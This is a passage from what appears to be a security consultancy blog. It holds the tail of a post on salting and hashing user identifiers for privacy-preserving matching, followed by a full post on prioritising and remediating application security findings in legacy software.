Both of these issues can be greatly helped by increasing the complexity of the input into the hash function. This can both remove the tendency for anonymised data to carry identical identifiers across instances, and also reduce the chance of it becoming feasible to reverse-calculate all possible values. Unfortunately there is no perfect solution to this if user-matching functionality comes first.

The correct solution as it should be used to store passwords, entry specific salting (for example with bcrypt),  is not feasible for a matching algorithm as it will only work for comparing hashed input to stored hashes, and it will not work for comparing stored hashes to stored hashes.

However, if you as a developer are determined to make a server side matching service for your users, then you need to apply a hybrid approach. This is not good practice for highly sensitive information, but it should retain the functionality needed for server side matching.

Your first privacy step is to make sure your hashes do not match those collected or used by anyone else, do this by adding some constant secret to them, a process called salting.

e.g., adding 9835476579080945368095468905486 to the start of every number before you hash

This will make all of your hashes different to those used by any other developer, but will still compare them properly. The same input will give the same output.

However, there is still a problem – If your secret salt is leaked or disclosed the reversing attacks outlined earlier become possible. To avoid this, increase the complexity of input by hashing more complex data. So, rather than just hashing the phone number, hash the name, email, and phone number together. This does introduce the problem of causing hashes to disagree if any part of the input differs by misspelling, typo’s etc…

The best way to protect your user’s data from disclosure, and your reputation from damage due to a privacy breach:

  • Don’t collect or send sensitive user data or hashes in the first place – using the security principle of least privilege.
  • Ask for access in a very obvious and unambiguous way – informed consent.

Hit me/us up on twitter ( @neohapsis or @secvalve) if you have any comments or discussion. (Especially if I made an error!)

[Update] Added author byline and clarified some wording.

Groundhog Day in the Application Security World

By Kate Pearce, a Security Consultant and Researcher at Neohapsis

Throughout the US on Groundhog Day, an inordinate amount of media attention will be given to small furry creatures and whether or not they emerge into bright sunlight or cloudy skies. In a tradition that may seem rather topsy-turvy to those not familiar with it, the story says that if the groundhog sees his shadow (indicating the sun is shining), he returns to his hole to sleep for six more weeks and avoid the winter weather that is to come.

Similarly, when a company comes into the world of security and begins to endure the glare of security testing, the shadow of what they find can be enough to send them back into hiding. However, with the right preparation and mindset, businesses can not only withstand the sight of insecurity, they can begin to make meaningful and incremental improvements to ensure that the next time they face the sun the shadow is far less intimidating.

Hundreds or thousands of issues – Why?

It is not uncommon for a Neohapsis consultant to find hundreds of potential issues to sort through when assessing a legacy application or website for the first time. This can be due to a number of reasons, but the most prominent are:

  1. Security tools that are paranoid/badly tuned/misunderstood
  2. Lack of developer security awareness
  3. Threats and technologies have evolved since the application was designed/deployed/developed

Security Tools that are Paranoid/Badly Tuned/Misunderstood

Security testing and auditing tools, by their nature, have to be flexible and able to work in most environments and at various levels of paranoia. Because of this, if they are not configured and interpreted with the specifics of your application in mind they will often find a large number of issues, of which the majority are noise that should be ignored until the more important issues are fixed. If you have a serious, unauthenticated, SQL injection that exposes plain-text credit card and payment details, you probably shouldn’t a moment’s thought stressing about whether your website allows 4 or 5 failed logins before locking an account.

Lack of Developer Security Awareness

Developers are human (at least in my experience!), and have all the usual foibles of humanity. They are affected by business pressures to release first and fix bugs later, with the result that security bugs may be de-prioritized down as “no-one will find that” and so “later” never comes. Developers also are often taught about security as an addition rather than a core concept. For instance, when I was learning programming, I was first taught to construct SQL strings and verbatim webpage output and only much later to use parameterized queries and HTML encoding. As a result, even though I know better, I sometimes find myself falling into bad practices that could introduce SQL injection or cross-site scripting, as the practices that introduce these threats come more naturally to me than the secure equivalents.

Threats and Technologies have Evolved Since the Application was Designed/Deployed/Developed

To make it even harder to manage security, many legacy applications are developed in old technologies which are either unaware of security issues, have no way of dealing with them, or both. For instance, while SQL injection has been known about for around 15 years, and cross-site scripting a little less than that, some are far more recent, such as clickjacking and CSS history stealing.

When an application was developed without awareness of a threat, it is often more vulnerable to it, and when it was built on a technology that was less mature in approaching the threat remediating the issues can be far more difficult. For instance, try remediating SQL injection in a legacy ASP application by changing queries from string concatenation to parameterized queries (ADODB objects aren’t exactly elegant to use!).

Dealing with issues

Once you have found issues, then comes the daunting task of prioritizing, managing, and preventing their reoccurrence. This is the part that can bring the shock, and the part that can require the most care, as this is a task in managing complexity.

The response to issues requires not only looking at what you have found previously, but also what you have to do, and where you want to go. Breaking this down:

  1. Understand the Past – Deal with existing issues
  2. Manage the Present – Remedy old issues, prevent introduction of new issues where possible
  3.  Prepare for the Future – Expect new threats to arise

Understand the Past – Deal with Existing Issues

When dealing with security reports, it is important to always be psychologically and organizationally prepared for what you find. As already discussed, this is often unpleasant and the first reactions can lead to dangerous behaviors such as overreaction (“fire the person responsible”) or disillusionment (“we couldn’t possibly fix all that!”). The initial results may be frightening, but flight is not an option, so you need to fight.

To understand what you have in front of you, and to react appropriately, it is imperative that the person interpreting the results understands the tools used to develop the application; the threats surrounding the application; and the security tool and its results. If your organization is not confident in this ability, consider getting outside help or consultants (such as Neohapsis) in to explain the background and context of your findings.

 Manage the present – Remedy old issues, prevent introduction of new issues where possible

Much like any software bug or defect, once you have an idea of what your overall results mean you should start making sense of them. This can be greatly aided through the use of a system (such as Neohapsis Security Manager) which can take vulnerability data from a large number of sources and track issues across time in a similar way to a bug tracker.

Issues found should then be dealt with in order of the threat they present to your application and organization. We have often observed a tendency to go for the vulnerabilities labeled as “critical” by a tool, irrespective of their meaning in the context of your business and application. A SQL injection bug in your administration interface that is only accessible by trusted users is probably a lot less serious than a logic flaw that allows users to order items and modify the price communicated and charged to zero.

Also, if required, your organization should rapidly institute training and awareness programs so that no more avoidable issues are introduced. This can be aided by integrating security testing into your QA and pre-production testing.

 Prepare for the future – Expect new threats to arise

Nevertheless, even if you do everything right, and even if your developers do not introduce any avoidable vulnerabilities, new issues will probably be found as the threats evolve. To detect these, you need to regularly have security tests performed (both human and automated), keep up with the security state of the technologies in use, and have plans in place to deal with any new issues that are found.

Closing

It is not unusual to find a frightening degree of insecurity when you first bring your applications into the world of security testing, but diving back to hide is not prudent. Utilizing the right experience and tools can turn being afraid of your own shadow into being prepared for the changes to come. After all, if the cloud isn’t on the horizon for your company then you are probably already immersed in it.